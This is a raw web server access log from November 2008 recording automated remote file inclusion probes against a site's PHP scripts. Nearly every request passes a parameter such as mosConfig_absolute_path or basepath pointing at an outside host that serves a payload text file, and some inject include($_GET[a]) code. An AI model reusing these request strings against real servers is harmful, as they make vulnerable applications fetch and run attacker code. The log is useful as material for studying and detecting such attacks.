67.205.7.217 - - [04/Nov/2008:11:29:53 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:29:55 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:30:08 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:30:57 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:30:57 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:30:58 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:11:31:13 -0800] "GET /logs/access_080502.log//include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
222.237.78.125 - - [04/Nov/2008:11:31:14 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%20http://www.pastor2youth.com/kneba/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:31:31 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:31:31 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:31:58 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:31:58 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:11:32:02 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:11:32:02 -0800] "GET /logs/access_080911.log/index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:11:32:03 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:32:25 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:32:54 -0800] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:32:54 -0800] "GET /modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:32:54 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:33:05 -0800] "GET /logs/access_080810.log//index.php?option=com_frontpage&task=§ionid=&id=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:33:31 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:33:31 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:33:32 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:33:32 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:33:32 -0800] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:33:32 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:11:33:34 -0800] "GET /logs/access_080116.log HTTP/1.0" 200 601743 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:33:36 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:33:40 -0800] "GET /logs/access_080612.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:33:40 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:33:40 -0800] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:33:41 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:33:48 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:33:48 -0800] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:33:48 -0800] "GET /modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:33:50 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:34:03 -0800] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:34:29 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:34:29 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:34:38 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:34:38 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:11:34:57 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:11:34:57 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:35:46 -0800] "GET /logs/access_080612.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:35:46 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:35:46 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:35:51 -0800] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:35:51 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:35:51 -0800] "GET /logs/access_080612.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:35:52 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:36:04 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:11:36:32 -0800] "GET /logs/access_080121.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:11:36:32 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:11:36:32 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:11:36:37 -0800] "GET /logs/access_080531.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:11:36:40 -0800] "GET /logs/access_080830.log/index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:36:47 -0800] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:11:37:34 -0800] "GET /logs/access_080110.log HTTP/1.0" 200 682778 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.53.141.2 - - [04/Nov/2008:11:37:39 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.53.141.2 - - [04/Nov/2008:11:37:40 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:38:03 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:38:03 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:38:04 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:38:05 -0800] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:38:06 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:38:24 -0800] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:38:29 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:38:30 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:38:52 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:38:52 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:38:53 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:38:59 -0800] "GET /logs/access_080911.log/index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:38:59 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:39:00 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:39:19 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
201.41.39.74 - - [04/Nov/2008:11:39:31 -0800] "GET /logs/access_080121.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.41.39.74 - - [04/Nov/2008:11:39:31 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:39:32 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:39:32 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:39:34 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
201.41.39.74 - - [04/Nov/2008:11:39:38 -0800] "GET /logs/access_080531.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:39:40 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:39:40 -0800] "GET /logs/access_080118.log%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:39:40 -0800] "GET /logs/access_080111.log%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:39:40 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:39:42 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:40:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:40:16 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:40:16 -0800] "GET /logs/access_080118.log%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:40:16 -0800] "GET /logs/access_080111.log%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:40:26 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
